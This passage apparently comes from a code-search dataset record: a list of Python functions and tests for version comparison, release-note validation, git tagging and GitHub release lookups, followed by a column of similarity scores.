utils.raise_with_traceback(e, tb)\n log.sub()\n\n log.echo('Validation passed')", "def can_safely_release(*repo_paths):\n if repo_has_uncommitted():\n return False\n if repo_has_incoming(*repo_paths):\n return False\n if repo_has_outgoing():\n return continue_with_outgoing()\n return True", "def test_get_release_pr():\n org = 'org'\n repo = 'repo'\n access_token = 'access'\n\n with patch('github.requests.get', return_value=Mock(json=Mock(return_value=FAKE_PULLS))) as get_mock:\n pr = get_release_pr(access_token, org, repo)\n get_mock.assert_called_once_with(\"https://api.github.com/repos/{org}/{repo}/pulls\".format(\n org=org,\n repo=repo,\n ), headers=github_auth_headers(access_token))\n assert pr.body == RELEASE_PR['body']\n assert pr.url == RELEASE_PR['html_url']\n assert pr.version == '0.53.3'", "def _does_require_force_update(self):\n\n if self.current_version[0][0] > self.version_yaml[0]:\n # The current version first index is greater than the one we have in the\n # current version.yaml.\n\n # We return True.\n return True\n\n # We return False, we do not need to force the update for\n # the current version number.\n return False", "def test_get_release_pr_no_pulls():\n with patch(\n 'github.requests.get', return_value=Mock(json=Mock(return_value=[OTHER_PR]))\n ):\n assert get_release_pr('access_token', 'org', 'repo-missing') is None", "def test_package_version():\n coverage_version = package_version('coverage')\n pytest_version = package_version('pytest')\n\n assert coverage_version is not None\n assert coverage_version < (1000, 0, 0)\n assert pytest_version is not None\n 
assert pytest_version > (5, 0)", "def check_for_updates(package_name, latest_version_str, our_version_str=VERSION):\n our = dict()\n latest = dict()\n for version, suffix in ((our, our_version_str), (latest, latest_version_str)):\n for part in ['major', 'minor', 'patch']:\n version[part], _, suffix = suffix.partition('.')\n version[part] = int(version[part])\n version['suffix'] = suffix\n\n for part in ['major', 'minor', 'patch', 'suffix']:\n if latest[part] > our[part]:\n if part == 'major':\n sys.exit(messages['UpdateRequired'].format(package_name))\n else:\n print >> sys.stderr, messages['UpdateAvailable'].format(package_name)\n return", "def isDBReleaseAvailable(dbh, version, lfns, jobPars):\n\n DBReleaseIsAvailable = False\n if version == \"\":\n tolog(\"Job parameters did not specify a DBRelease version (can not verify local availability)\")\n else:\n for lfn in lfns:\n if isDBReleaseFile(dbh, lfn):\n tolog(\"Found a DBRelease file in the input file list (will check local availability)\")\n\n # is the requested DBRelease file available locally?\n if dbh.isDBReleaseAvailable(version):\n tolog(\"%s is available locally (will not be staged-in)\" % (lfn))\n DBReleaseIsAvailable = True\n break\n\n return DBReleaseIsAvailable", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def is_release_notes_changed(self):\n # there exists a difference between origin/master and current branch\n if self.master_diff:\n diff_releases = self.master_diff.split('##')\n unreleased_section = diff_releases[1]\n unreleased_section_lines = unreleased_section.split('\\n')\n\n adds_in_diff = 0\n removes_in_diff = 0\n\n for line in unreleased_section_lines:\n if line.startswith('+'):\n adds_in_diff += 1\n elif line.startswith('-') and not re.match(r'- *$', line):\n removes_in_diff += 1\n\n # means that at least one new line was added\n if adds_in_diff - removes_in_diff > 0:\n return True\n\n print_error(F'No new comment has been added in the release notes file: {self.release_notes_path}')\n return False", "def 
test_major(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[0] = int(new_version_parts[0]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is False", "def is_valid_release_notes_structure(self):\n release_notes_comments = self.latest_release_notes.split('\\n')\n\n if not release_notes_comments[-1]:\n release_notes_comments = release_notes_comments[:-1]\n\n if len(release_notes_comments) == 1 and self.is_valid_one_line_comment(release_notes_comments):\n return True\n\n elif len(release_notes_comments) <= 1:\n print_error(F'File {self.release_notes_path} is not formatted according to '\n F'release notes standards.\\nFix according to {self.LINK_TO_RELEASE_NOTES_STANDARD}')\n return False\n\n else:\n if self.is_valid_one_line_comment(release_notes_comments):\n release_notes_comments = release_notes_comments[1:]\n\n if not self.is_valid_multi_line_comment(release_notes_comments):\n print_error(F'File {self.release_notes_path} is not formatted according to '\n F'release notes standards.\\nFix according to {self.LINK_TO_RELEASE_NOTES_STANDARD}')\n return False\n\n return True", "def is_stable(self) -> bool:\n return not self.is_prerelease", "def test_releaseWithNewsfragments(self):\n runCommand(\n [\"git\", \"checkout\", \"-b\", \"release-16.11111-9001\"], cwd=self.repo.path\n )\n\n newsfragments = self.repo.child(\"twisted\").child(\"newsfragments\")\n newsfragments.makedirs()\n fragment = newsfragments.child(\"1234.misc\")\n fragment.setContent(b\"\")\n\n unrelated = self.repo.child(\"somefile\")\n unrelated.setContent(b\"Boo\")\n\n runCommand([\"git\", \"add\", fragment.path, unrelated.path], cwd=self.repo.path)\n runCommand([\"git\", \"commit\", \"-m\", \"fragment\"], cwd=self.repo.path)\n\n logs = []\n\n with self.assertRaises(SystemExit) as e:\n CheckNewsfragmentScript(logs.append).main([self.repo.path])\n\n self.assertEqual(e.exception.args, (1,))\n self.assertEqual(logs[-1], \"No newsfragments should be on the release branch.\")", "def test_sort_git_master_and_latest(self):\n identifiers = [\"latest\", \"master\", \"1.0\", \"2.0\", \"1.1\", \"1.9\", \"1.10\"]\n self.project.repo_type = REPO_TYPE_GIT\n self.project.save()\n self.project.versions.get(slug=LATEST).delete()\n\n for identifier in identifiers:\n get(\n Version,\n project=self.project,\n type=BRANCH,\n identifier=identifier,\n verbose_name=identifier,\n slug=identifier,\n )\n\n versions = list(Version.objects.filter(project=self.project))\n self.assertEqual(\n [\"master\", \"latest\", \"2.0\", \"1.10\", \"1.9\", \"1.1\", \"1.0\"],\n [v.slug for v in sort_version_aware(versions)],\n )", "def check_for_major_changes(cabal: CabalFile) -> bool:\n old_ver = cabal.get_version()\n old_tag = None\n if f'v{old_ver}' in get_tags():\n old_tag = f'v{old_ver}'\n if f'{old_ver}' in get_tags():\n old_tag = f'{old_ver}'\n if old_tag is None:\n print(f\"Couldn't find tag {old_tag} for current version; skipping revision check.\\n\")\n return False\n\n cmd = ['git', 'diff', '--name-only', f'{old_tag}..HEAD']\n changed_files = [ l.strip()\n for l in check_output(cmd).decode('UTF-8').split('\\n')\n if len(l.strip()) > 0 ]\n non_cabals = [ f\n for f in changed_files\n if not f.endswith('.cabal') ]\n print(f\"{len(changed_files)} files have changed since {old_tag}:\\n \",\n ' \\n'.join(changed_files))\n\n if len(non_cabals) > 0:\n return False\n else:\n print(dedent(f'''\n It appears that the only changes between {old_tag} and now are in the\n cabal file. 
Perhaps you want to make a revision instead?\n\n y = make a revision\n n = do a full release anyways\n d = show me a diff\n '''))\n while True:\n resp = prompt_for_char('How to proceed?', options='ynd')\n if resp == 'd':\n cmd = ['git', 'diff', f'{old_tag}..HEAD']\n print(' '.join(cmd))\n check_call(cmd)\n elif resp == 'y':\n return True\n elif resp == 'n':\n return False", "def get_release_info(self, release):\n rel_os = release.operating_system.lower()\n version = release.version\n\n release_info = filter(\n lambda r: (\n r['os'] == rel_os and\n ClusterPlugins.is_release_version_compatible(version,\n r['version'])),\n self.plugin.releases)\n\n return release_info[0]", "def test_installed_beta_no_newer_stable(self):\n self.change_version(self.version_1_2_2, '1.2beta')\n self.change_status(self.version_1_2_2, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_1", "def commit_check(ctx):\n result = ctx.run(f\"{VENV_PREFIX} cz check --rev-range master..\", warn=True)\n if result.exited == 3: # NO_COMMIT_FOUND\n exit(0)\n else:\n exit(result.exited)", "def tag_release():\n # We're assuming that setup.py has already been updated\n # manually or using scripts/release/bump-version so the\n # current version in setup.py is the version number we should tag.\n version_number = get_current_version_number()\n click.echo(\"Tagging %s release\" % version_number)\n subprocess.check_call(\n ['git', 'tag', '-a', version_number,\n '-m', 'Tagging %s release' % version_number],\n )", "def test_higher_version_preferred_even_when_tag_is_on_top_of_the_tree(self):\n try:\n self.prepare(tag_latest_version=True)\n self.assertEquals((1, 3, 0), compute_version(\n get_git_describe(repository_directory=self.repo, fix_environment=True, accepted_tag_pattern='repo-*')\n ))\n finally:\n rmtree(self.repo)\n os.chdir(self.oldcwd)", "def test__releases_in_range_current(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 0): '',\n })\n ver = U.UCS_Version((MAJOR, MINOR, 0))\n versions = self.u._releases_in_range()\n self.assertEqual([ver], versions)", "def test_too_many_releases():\n pulls = [RELEASE_PR, RELEASE_PR]\n with pytest.raises(Exception) as ex, patch(\n 'github.requests.get', return_value=Mock(json=Mock(return_value=pulls))\n ):\n get_release_pr('access_token', 'org', 'repo')\n\n assert ex.value.args[0] == \"More than one pull request for the branch release-candidate\"", "def verify_up_to_date(path, branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch up to date:\")\n run_in_component(path, ['git', 'remote', 'update'])\n\n result = run_in_component(path, ['git', 'rev-list', 'HEAD...origin/%s' % branch, '--count'])\n count = int(result.strip())\n\n if count == 0:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You branch is not up-to-date with remote branch: %d different commits\" % count)", "def test_release(self):\n r = self.d.release(1)\n self.assertEqual(r.title, 'Stockholm')", "def validate_change(ticket):\n # First ensure topic line mentions tickets, and pull them out.\n topic = COMMIT_MSG.split('\\n', 1)[0]\n fix_tickets = re.findall(\"[A-Z]{2,5}-[0-9]{1,6}\", topic)\n if len(fix_tickets) == 0:\n print \"\\n\\n\\n\\n\\n*********\\nERROR: commit message does not name a ticket!\"\n return False\n\n # Now get list of approved tickets from master ticket, and ensure\n # all \"fixed\" tickets are approved.\n approved_tickets = get_approved_tickets(ticket)\n 
for tick in fix_tickets:\n if not tick in approved_tickets:\n print \"\\n\\n\\n\\n\\n*********\\nERROR: ticket {} is not approved (see approval ticket {})\".format(\n tick, ticket)\n return False\n return True", "def test_bump_minor(version: str, bumped: str) -> None:\n assert bump(version, \"minor\") == bumped", "def test_version_missing(self):\r\n self.assertIsNone(self._version_test(self.no_version))", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def test_beta_updates_to_stable(self):\n self.change_version(self.version_1_2_0, '1.2beta')\n self.change_status(self.version_1_2_0, amo.STATUS_BETA)\n self.change_status(self.version_1_2_2, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_1", "def test_higher_version_always_preferred(self):\n try:\n self.prepare()\n self.assertEquals((1, 2, 4), compute_version(\n get_git_describe(repository_directory=self.repo, fix_environment=True, accepted_tag_pattern='repo-*')\n ))\n finally:\n rmtree(self.repo)\n os.chdir(self.oldcwd)", "def verify_Version_buildNumber():\r\n msg, flag = \"\", False\r\n try:\r\n 'Getting Build number for IOS '\r\n if g.platform == 'ios':\r\n flag1, msg1 = verify_ios_versionNumber()\r\n msg += msg1\r\n flag2, msg2 = verify_ios_buildNumber()\r\n msg += msg2\r\n 'go back'\r\n flag3=ui_controls.image(get_obj_identifier('about_back_btn'))\r\n print 'cliked on back button'\r\n flag = False if not (flag1 and flag2 and flag3) else True\r\n else:\r\n text_view = ui_controls.text_view(get_obj_identifier('about_buildVersion_lbl'))\r\n \r\n if text_view.strip() == g.android_version_no.strip():\r\n \r\n print \"Version and Build number matched. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag = True \r\n else:\r\n \r\n print \"Version and Build number does not match. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag1=ui_controls.back_button()\r\n \r\n flag = False if not (flag1) else True\r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n return flag, msg", "def check_version():\n err = \"PaddlePaddle version 1.6 or higher is required, \" \\\n \"or a suitable develop version is satisfied as well. 
\\n\" \\\n \"Please make sure the version is good with your code.\" \\\n\n try:\n fluid.require_version('1.6.0')\n except Exception as e:\n logger.error(err)\n sys.exit(1)", "def test_release_tag_for_empty(self) -> None:\n with self.assertRaisesRegexp(ValueError, \"Unable to parse version \"):\n release_tag()", "async def test_finish_release_no_release(doof, repo_info, event_loop, mocker):\n get_release_pr_mock = mocker.patch('bot.get_release_pr', autospec=True, return_value=None)\n with pytest.raises(ReleaseException) as ex:\n await doof.run_command(\n manager='mitodl_user',\n channel_id=repo_info.channel_id,\n words=['finish', 'release'],\n loop=event_loop,\n )\n assert 'No release currently in progress' in ex.value.args[0]\n org, repo = get_org_and_repo(repo_info.repo_url)\n get_release_pr_mock.assert_called_once_with(GITHUB_ACCESS, org, repo)", "def check_os_version():\n if not version.is_supported_version():\n supported_releases = []\n for rel in version.SUPPORTED_VERSIONS:\n for ver in version.SUPPORTED_VERSIONS[rel]:\n supported_releases.append(rel.upper() + ' ' + ver)\n reporting.create_report([\n reporting.Title(\n 'The installed OS version is not supported for the in-place upgrade to the target RHEL version'\n ),\n reporting.Summary(\n 'The supported OS releases for the upgrade process:\\n'\n ' {}'.format('\\n'.join(supported_releases))\n ),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS),\n reporting.Groups([reporting.Groups.INHIBITOR]),\n # we want to set a static Key here because of different Title per path\n reporting.Key('1c7a98849a747ec9890f04bf4321de7280970715')\n ] + related)", "def check_for_update():\n\n # get most recent commit\n r = requests.get('https://api.github.com/repos/PokeMiners/game_masters/git/refs/heads/master')\n\n with open('forms.json', 'r') as f:\n forms = json.load(f)\n last_commit = forms['commit']\n\n # check if most recent commit is the same as the commit of the last downloaded game_master\n if r.status_code == 200:\n latest = json.loads(r.text)\n recent_commit = latest['object']['sha']\n if recent_commit == last_commit:\n return False\n\n print('New version of game_master found')\n r = requests.get('https://raw.githubusercontent.com/PokeMiners/game_masters/master/latest/latest.json')\n if r.status_code != 200:\n print('Couldn\\'t access latest game_master (did the url change?)', file=sys.stderr)\n return False\n \n # save new game_master\n game_master = json.loads(r.text)\n with open('game_master.json', 'w') as f:\n json.dump(game_master, f, indent=4)\n\n # store commit of current game_master\n with open('forms.json', 'w') as f:\n forms['commit'] = recent_commit\n json.dump(forms, f, indent=4)\n\n return True", "def test_ge_master(\n self, aiosmtpd_version: version.Version, capsys: pytest.CaptureFixture\n ):\n reference = \"master:aiosmtpd/__init__.py\"\n cmd = f\"git show {reference}\".split()\n try:\n with capsys.disabled():\n master_smtp = subprocess.check_output(cmd).decode() # nosec\n except subprocess.CalledProcessError:\n pytest.skip(\"Skipping due to git error\")\n return\n for ln in master_smtp.splitlines():\n m = RE_DUNDERVER.match(ln)\n if m:\n break\n else:\n pytest.fail(f\"Cannot find __version__ in {reference}!\")\n master_ver = version.parse(m.group(\"ver\"))\n assert aiosmtpd_version >= master_ver, \"Version number cannot be < master's\"", "def version_check(self):\n param_name = \"rethink/software_version\"\n sdk_version = settings.SDK_VERSION\n\n # get local lock for rosparam threading bug\n 
with self.__class__.param_lock:\n robot_version = rospy.get_param(param_name, None)\n if not robot_version:\n rospy.logwarn(\"RobotEnable: Failed to retrieve robot version \"\n \"from rosparam: %s\\n\"\n \"Verify robot state and connectivity \"\n \"(i.e. ROS_MASTER_URI)\", param_name)\n return False\n else:\n # parse out first 3 digits of robot version tag\n pattern = (\"^([0-9]+)\\.([0-9]+)\\.([0-9]+)\")\n match = re.search(pattern, robot_version)\n if not match:\n rospy.logwarn(\"RobotEnable: Invalid robot version: %s\",\n robot_version)\n return False\n robot_version = match.string[match.start(1):match.end(3)]\n if robot_version not in settings.VERSIONS_SDK2ROBOT[sdk_version]:\n errstr_version = \"\"\"RobotEnable: Software Version Mismatch.\nRobot Software version (%s) does not match local SDK version (%s). Please\nUpdate your Robot Software. \\\nSee: http://sdk.rethinkrobotics.com/wiki/Software_Update\"\"\"\n rospy.logerr(errstr_version, robot_version, sdk_version)\n return False\n return True", "def check_build_status(owner, repository, ref):\n return get_hvcs().check_build_status(owner, repository, ref)", "async def test_release_in_progress(doof, repo_info, event_loop, mocker, command):\n version = '1.2.3'\n url = 'http://fake.release.pr'\n mocker.patch('bot.get_release_pr', autospec=True, return_value=ReleasePR(\n version=version,\n url=url,\n body='Release PR body',\n ))\n\n command_words = command.split() + [version]\n with pytest.raises(ReleaseException) as ex:\n await doof.run_command(\n manager='mitodl_user',\n channel_id=repo_info.channel_id,\n words=command_words,\n loop=event_loop,\n )\n assert ex.value.args[0] == \"A release is already in progress: {}\".format(url)", "def vtk_version_ok(major, minor, build):\n requested_version = (100 * int(major) + int(minor)) * 100000000 + int(build)\n ver = vtkVersion()\n actual_version = (100 * ver.GetVTKMajorVersion() + ver.GetVTKMinorVersion()) \\\n * 100000000 + ver.GetVTKBuildVersion()\n if actual_version >= requested_version:\n return True\n else:\n return False", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def check_for_updates():\n last_version = str(request.urlopen(__source__).read().decode(\"utf8\"))\n if str(open(__file__).read()) != last_version:\n log.warning(\"Theres new Version available!, Update from \" + __source__)\n else:\n log.info(\"No new updates!,You have the lastest version of this app.\")", "def is_versioned(target):\n\n assert os.path.exists(target), \"%s does not exist!\" % target\n git_tree = get_git_tree(target)\n\n versioned = False\n if git_tree is not None:\n output = gitopen([\"status\", \"--ignored\", \"--porcelain\", target], git_tree)\n if not (output.startswith(b\"!!\") or output.startswith(b\"??\")):\n versioned = True\n\n return versioned" ]
[ "0.69423383", "0.6784403", "0.66795766", "0.6649919", "0.6507445", "0.64944094", "0.63654304", "0.6350596", "0.6347604", "0.63336277", "0.6305721", "0.6219666", "0.62047046", "0.61802447", "0.6172858", "0.612331", "0.6118963", "0.6113204", "0.6088553", "0.60614514", "0.60483974", "0.6042252", "0.60349816", "0.5964456", "0.59581023", "0.59537", "0.59341335", "0.5920642", "0.5894531", "0.58798224", "0.5879559", "0.58659893", "0.5849183", "0.5831574", "0.58128935", "0.57728636", "0.57661736", "0.57623553", "0.5751964", "0.5743015", "0.57273674", "0.5714646", "0.57014716", "0.5695072", "0.56911373", "0.56899685", "0.56805974", "0.56713086", "0.56658286", "0.56537205", "0.56473076", "0.5625349", "0.5623772", "0.5618431", "0.5617925", "0.5596673", "0.55845445", "0.5576501", "0.5573185", "0.5564981", "0.5551658", "0.5549566", "0.55421424", "0.5541864", "0.55306077", "0.55224156", "0.55115044", "0.55071557", "0.5506876", "0.54922307", "0.54882133", "0.548688", "0.5479357", "0.54761577", "0.5474809", "0.5473272", "0.54721004", "0.54675037", "0.54670006", "0.54610306", "0.5439877", "0.54304093", "0.54293716", "0.5428319", "0.54269487", "0.54242617", "0.5422349", "0.5421082", "0.54168713", "0.5411046", "0.5409721", "0.5409114", "0.5394566", "0.5393198", "0.5380802", "0.5373157", "0.5367806", "0.5366845", "0.53608334", "0.53607374" ]
0.73628855
0
Evaluate the mfcc_length for a given file
def get_mfcc_length_from_duration(duration):
    length = int(duration // FRAME_STRIDE) - 1
    return length
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wav2mfcc(file_path, max_len=44, n_mfcc=20):", "def mfcc(path, windowsize, overlap, M):\n srate, data = scipy.io.wavfile.read(path)\n\n bank = filterbank(0, srate/2, M, srate, windowsize)\n buckets = bucketize(data/32768.0, windowsize, overlap)\n energies = buckets.dot(bank.transpose())\n\n return scipy.fftpack.dct(numpy.log10(energies))", "def extract_mfccs(file_name, pad_len=174, n_mfcc=40):\n\n signal, sr = librosa.load(file_name, res_type='kaiser_fast')\n mfccs = librosa.feature.mfcc(signal, sr=sr, n_mfcc=n_mfcc)\n\n if mfccs.shape[1] > pad_len:\n mfccs = mfccs[:, :pad_len]\n else:\n pad_width = pad_len - mfccs.shape[1]\n mfccs = np.pad(mfccs, ((0, 0), (0, pad_width)), mode='constant')\n\n return mfccs", "def findFLength(filename):\n f = os.popen('wc -l < {}'.format(filename))\n return int(f.read())", "def get_recording_length(file_path):\n f = open(file_path, 'rb')\n header = f.read(256)\n f.close()\n \n return int(header[236:244].decode('ascii'))", "def sox_get_audio_length(self, audio_file):\n logging.info('Getting source file length ...')\n result = self._process_command('soxi -D \"%s\"' % audio_file, PIPE)\n if result[1][0] != '':\n return float(result[1][0].strip('\\n'))\n else:\n return 1000", "def wav2mfcc(file_path):\r\n #Load .wav to array\r\n wave, _ = librosa.load(file_path, mono=Constants.channelMap[Tunable.tunableDict['channels']], sr=Tunable.tunableDict['samplingRate'])\r\n wave = np.asfortranarray(wave)\r\n\r\n #Convert to Mel-Frequency Cepstral Coefficients\r\n mfcc = librosa.feature.mfcc(wave, sr=Tunable.tunableDict['samplingRate'], n_mfcc=Tunable.tunableDict['buckets'])\r\n\r\n # If maximum length exceeds mfcc lengths then pad the remaining ones\r\n if Tunable.tunableDict['maxLen'] > mfcc.shape[1]:\r\n pad_width = Tunable.tunableDict['maxLen'] - mfcc.shape[1]\r\n mfcc = np.pad(mfcc, pad_width=((0, 0), (0, pad_width)), mode='minimum')\r\n\r\n # Else cutoff the remaining parts\r\n else:\r\n mfcc = mfcc[:, :Tunable.tunableDict['maxLen']]\r\n\r\n return [mfcc]", "def compute_data_len(data_file):\n max_src_len = -1\n max_target_len = -1\n\n sum_src_lens = 0.0\n sum_target_lens = 0.0\n\n num_entries = 0\n all_src_lens = []\n all_target_lens = []\n\n # Maintain frequency statistics\n src_counter = collections.Counter()\n target_counter = collections.Counter()\n\n with open(data_file, \"r\") as f:\n for line in f:\n _, src, target = line.split(\"\\t\")\n curr_src_len = len(src.strip().split(\" \"))\n curr_target_len = len(target.strip().split(\" \"))\n\n all_src_lens.append(curr_src_len)\n all_target_lens.append(curr_target_len)\n\n src_counter[curr_src_len] += 1\n target_counter[curr_target_len] += 1\n\n sum_src_lens += curr_src_len\n sum_target_lens += curr_target_len\n\n if curr_src_len > max_src_len:\n max_src_len = curr_src_len\n\n if curr_target_len > max_target_len:\n max_target_len = curr_target_len\n\n num_entries += 1\n\n print \"Max source length: \", max_src_len\n print \"Max target length: \", max_target_len\n\n print \"Avg source length: \", sum_src_lens / num_entries\n print \"Avg target length: \", sum_target_lens / num_entries\n\n\n threshold = 350\n get_cdf(threshold, src_counter)\n get_cdf(threshold, target_counter)", "def SentenceLength(f):\n\tcounter=0\n\twith open(filename) as f:\n\t\tread = csv.reader(f)\n\t\tfor row in read:\n\t\t\t#Original\n\t\t\tzin0=row[0].split()\n\t\t\t#Human Translation\n\t\t\tzin1=row[1].split()\n\t\t\t#Machine Translation\n\t\t\tzin2=row[2].split()\n\t\t\tcounter+=1\n\t\t\t#PRINT LENGTH 
DIFFERENCE\n\t\t\t#print(\"HT\",counter,(abs(len(zin0)- len(zin1))))\n\t\t\tprint(\"MT\",counter,(abs(len(zin0)- len(zin2))))", "def mfcc(wav_path, delta = 2):\n y, sr = librosa.load(wav_path)\n # MEL frequency cepstrum coefficient\n mfcc_feat = librosa.feature.mfcc(y = y, sr = sr, n_mfcc = 13)\n ans = [mfcc_feat]\n # Calculate the 1st derivative\n if delta >= 1:\n mfcc_delta1 = librosa.feature.delta(mfcc_feat, order = 1, mode ='nearest')\n ans.append(mfcc_delta1)\n # Calculate the 2nd derivative\n if delta >= 2:\n mfcc_delta2 = librosa.feature.delta(mfcc_feat, order = 2, mode ='nearest')\n ans.append(mfcc_delta2)\n return np.transpose(np.concatenate(ans, axis = 0),[1,0])", "def proc_one(filename):\n (rate, sig) = wav.read(filename)\n assert rate == samp_rate\n # since templates have max value of 32768, normalise it\n if sig.max() > 1:\n sig = sig / 32768\n # Normalise so that max-value is 1\n sig = sig / max(sig)\n\n # calculate MFCC\n feat = mfcc(sig, samplerate=samp_rate, winlen=win_length / 1000, winstep=hop / 1000, preemph=0.95, numcep=14,\n winfunc=np.hamming)\n # print(sig.shape, feat.shape)\n return feat", "def getAudioLengthFromAudioFile(audiofileforlengthcheck):\n aprobe = []\n aprobe.extend(probe_header)\n aprobe.extend(['-i', audiofileforlengthcheck])\n aprobe.extend(probe_arguments)\n aout = sp.check_output(\n aprobe\n )\n aint = aout.decode().strip()\n return aint", "def length(analog_file):\n if analog_file[-10:] == 'analog.brw':\n with h5py.File(analog_file, 'r') as file:\n print(len(file[\"3BData\"][\"Raw\"]))\n else:\n raise NotImplementedError(\"Only for use with *analog.brw files\")", "def FileLen(filename):\n return os.stat(str(filename))[6]", "def wav2mfccDataAugmnetation(file_path):\r\n #Load .wav to array\r\n augmentArray =[]\r\n wave, _ = librosa.load(file_path, mono=Constants.channelMap[Tunable.tunableDict['channels']], sr=Tunable.tunableDict['samplingRate'])\r\n for i in range(Tunable.tunableDict['pitchShiftLower'], Tunable.tunableDict['pitchShiftUpper']):\r\n wave = librosa.effects.pitch_shift(wave, sr=Tunable.tunableDict['samplingRate'], n_steps=i)\r\n wave = np.asfortranarray(wave)\r\n\r\n #Convert to Mel-Frequency Cepstral Coefficients\r\n mfcc = librosa.feature.mfcc(wave, sr=Tunable.tunableDict['samplingRate'], n_mfcc=Tunable.tunableDict['buckets'])\r\n\r\n # If maximum length exceeds mfcc lengths then pad the remaining ones\r\n if Tunable.tunableDict['maxLen'] > mfcc.shape[1]:\r\n pad_width = Tunable.tunableDict['maxLen'] - mfcc.shape[1]\r\n mfcc = np.pad(mfcc, pad_width=((0, 0), (0, pad_width)), mode='minimum')\r\n\r\n # Else cutoff the remaining parts\r\n else:\r\n mfcc = mfcc[:, :Tunable.tunableDict['maxLen']]\r\n augmentArray.append(mfcc)\r\n\r\n return augmentArray", "def do_mfccs(fname):\n sound, srate = sf.read(fname)\n \n #f = Sndfile(fname,'r')\n #srate = f.samplerate\n #nf = f.nframes\n #sound = f.read_frames(nf) \n fbanks = Spectral(\n nfilt=40, # nb of filters in mel bank\n alpha=0.97, # pre-emphasis\n fs=srate, # sampling rate\n frate=100, # frame rate\n wlen=0.025, # window length\n nfft=512, # length of dft\n ncep=13, # nb of cepstral coefficients\n lowerf=100,\n upperf=6855.4976,\n do_deltas=True, # speed\n do_deltasdeltas=True # acceleration\n )\n fb = np.array(fbanks.transform(sound), dtype='float32')\n return fb", "def calc_mfccs(audio_data, samplerate, n_mfcc=13, n_fft=400, hop_length=160):\n mfcc = librosa.feature.mfcc(audio_data, sr=samplerate, n_mfcc=n_mfcc, n_fft=n_fft, hop_length=hop_length)\n\n # add derivatives and normalize\n 
mfcc_delta = librosa.feature.delta(mfcc)\n mfcc_delta2 = librosa.feature.delta(mfcc, order=2)\n mfcc = np.concatenate((normalize(mfcc),\n normalize(mfcc_delta),\n normalize(mfcc_delta2)), axis=0)\n\n return mfcc.T", "def cmgProcessFile(f, offsetRecs=0, numRecs=None, elementsPerRec=4):\n uStart,joiner,uStop = fileTimeRange(f)\n print offsetRecs, numRecs, elementsPerRec\n data = readPadFile(f, offsetRecs=offsetRecs, numRecs=numRecs, elementsPerRec=elementsPerRec)\n\n print '(%s) %.3f ' % (split(f,os.path.sep)[-1], uStart),\n iMax = getMaxAbs(data)\n\n## zugmax = (10.0**6)*(data[iMax[-1],-1]) # for ossbtmf\n## print '%7.1f @ %d' % (zugmax,iMax[-1])\n\n zugmax = (10.0**6)*(data[iMax[-3],-3]) # for ossraw\n print '%7.1f @ %d' % (zugmax,iMax[-3])", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def preprocess(self, file, num_mfcc=13, n_fft=2048, hop_length=512):\r\n\r\n # load and resample audio file\r\n signal, sample_rate = librosa.load(file, sr=DATASET_SAMPLE_RATE)\r\n\r\n # check length of signal\r\n if len(signal) >= COMMAND_LENGTH:\r\n # truncate signal to COMMAND_LENGTH\r\n signal = signal[:COMMAND_LENGTH]\r\n\r\n elif len(signal) < COMMAND_LENGTH:\r\n # zero pad signal to COMMAND_LENGTH\r\n padding = np.zeros(COMMAND_LENGTH - len(signal))\r\n signal = np.append(signal, padding)\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc=num_mfcc, 